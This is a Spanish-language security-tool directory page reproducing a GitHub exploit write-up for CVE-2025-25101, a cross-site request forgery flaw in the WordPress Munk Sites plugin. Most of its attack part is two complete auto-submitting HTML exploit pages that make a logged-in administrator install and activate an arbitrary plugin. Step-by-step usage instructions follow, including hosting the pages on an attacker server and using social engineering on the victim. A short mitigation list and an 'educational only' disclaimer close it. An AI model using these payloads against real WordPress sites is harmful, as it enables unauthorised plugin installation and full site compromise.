Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-25101 — Plugin WordPress Munk Sites <= 1.0.7 - Vulnerabilidad de CSRF para instalación arbitraria de plugins | Kitploit
Herramientas/GitHubGitHub/nxploited/cve-2025-25101
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPhishingIngeniería SocialAprendizaje y Educación
GitHubnxploited/cve-2025-25101

CVE-2025-25101

Plugin WordPress Munk Sites <= 1.0.7 - Vulnerabilidad de CSRF para instalación arbitraria de plugins

Ver Repositorio
14hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

🚀 CVE-2025-25101 - Complemento Munk Sites de WordPress <= 1.0.7 - CSRF para instalación arbitraria de complementos

📌 Resumen

CVE-2025-25101 es una vulnerabilidad de Cross-Site Request Forgery (CSRF) en el complemento MetricThemes Munk Sites para WordPress (versiones ≤ 1.0.7).
Esta vulnerabilidad permite a un atacante no autenticado engañar a un administrador para que instale y active complementos arbitrarios, lo que potencialmente conduce a Remote Code Execution (RCE) o al compromiso del sitio web.

🛑 Versiones Afectadas

  • Complemento Munk Sites <= 1.0.7
  • WordPress Cualquier versión donde el complemento esté activo

🛡️ Clasificación de Seguridad (Puntuación CVSS)

PuntuaciónSeveridadVersiónCadena de Vector
9.6🔥 CRÍTICA3.1CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

🔥 Descripción del Exploit

🛠️ Cómo Funciona la Vulnerabilidad:

El fallo CSRF en el complemento Munk Sites permite a un atacante forzar a un administrador de WordPress con sesión iniciada a instalar y activar cualquier complemento de WordPress sin su consentimiento.
Esto se logra explotando una solicitud admin-ajax.php no protegida que carece de verificación de token CSRF.

📌 Flujo de Trabajo del Exploit:

  1. El atacante crea una página web maliciosa que contiene el payload CSRF.
  2. La víctima (administrador de WordPress) visita la página web del atacante.
  3. El exploit envía solicitudes silenciosamente a WordPress para instalar y activar un complemento arbitrario.
  4. El complemento se instala y activa sin ninguna interacción del administrador.

💻 Código del Exploit

1️⃣ Exploit CSRF - Instalar Complemento

Este payload obliga a la víctima a instalar el complemento hello-world.

root@kitploit:~
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>CSRF Exploit - Plugin Installation</title>
    <style>
        body { font-family: Arial, sans-serif; text-align: center; background: #f4f4f4; padding: 20px; }
        h1 { color: #d9534f; } h2 { color: #5bc0de; }
        .output { margin-top: 20px; padding: 10px; background: white; box-shadow: 0 0 10px rgba(0, 0, 0, 0.1); }
        .success { color: #5cb85c; font-weight: bold; }
    </style>
</head>
<body onload="document.forms[0].submit()">
    <h1>📌 CVE-2025-25101</h1>
    <h2>CSRF Exploit - Install 'Hello World' Plugin</h2>
    <h3>🚀 Exploit by: <b>Nxploit | Khaled Alenazi</b></h3>
    <div class="output" id="output">🔄 Installing plugin...</div>
    <form action="http://target.com/wp-admin/admin-ajax.php" method="GET">
        <input type="hidden" name="action" value="cs_install_plugin">
        <input type="hidden" name="plugin" value="hello-world">
    </form>
    <script>setTimeout(() => { document.getElementById("output").innerHTML = "<span class='success'>✅ Plugin installed successfully!</span>"; }, 5000);</script>
</body>
</html>

2️⃣ Exploit CSRF - Activar Complemento

Este payload obliga a la víctima a activar el complemento hello-world.

root@kitploit:~
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>CSRF Exploit - Plugin Activation</title>
    <style>
        body { font-family: Arial, sans-serif; text-align: center; background: #f4f4f4; padding: 20px; }
        h1 { color: #d9534f; } h2 { color: #f0ad4e; }
        .output { margin-top: 20px; padding: 10px; background: white; box-shadow: 0 0 10px rgba(0, 0, 0, 0.1); }
        .success { color: #5cb85c; font-weight: bold; }
    </style>
</head>
<body onload="document.forms[0].submit()">
    <h1>📌 CVE-2025-25101</h1>
    <h2>CSRF Exploit - Activate 'Hello World' Plugin</h2>
    <h3>🚀 Exploit by: <b>Nxploit | Khaled Alenazi</b></h3>
    <div class="output" id="output">🔄 Activating plugin...</div>
    <form action="http://target.com/wp-admin/admin-ajax.php" method="GET">
        <input type="hidden" name="action" value="cs_active_plugin">
        <input type="hidden" name="plugin" value="hello-world">
    </form>
    <script>setTimeout(() => { document.getElementById("output").innerHTML = "<span class='success'>✅ Plugin activated successfully!</span>"; }, 5000);</script>
</body>
</html>

🔥 Cómo Usarlo

  1. Aloja los archivos HTML maliciosos (install.html y activate.html) en un servidor controlado por el atacante.
  2. Engaña a un administrador de WordPress mediante ingeniería social para que visite install.html.
  3. Una vez que el complemento esté instalado, engáñalo para que visite activate.html.
  4. ¡El complemento hello-world se instalará y activará sin el consentimiento del administrador!

🚧 Mitigación

🔒 Cómo Proteger tu Sitio WordPress:

  • Actualiza a la última versión del complemento Munk Sites (si hay un parche disponible).
  • Usa un complemento de seguridad de WordPress como Wordfence o Sucuri para bloquear intentos de CSRF.
  • Restringe el acceso a admin-ajax.php mediante reglas de seguridad en .htaccess o la configuración de Nginx.
  • Asegúrate de que solo usuarios autenticados y autorizados puedan instalar o activar complementos.
  • Implementa protección CSRF usando wp_nonce_field() y check_admin_referer().

📜 Descargo de Responsabilidad

⚠️ Este exploit es solo para fines educativos y de investigación en seguridad.
⚠️ El uso no autorizado contra sistemas sin permiso explícito es ilegal.
⚠️ El autor no es responsable del mal uso de este código.


⭐ Soporte y Contribuciones

Si encuentras valiosa esta investigación, siéntete libre de ⭐ marcar el repositorio con una estrella y contribuir reportando nuevas vulnerabilidades.

Por: Nxploit | Khaled Alenazi

Descargar herramienta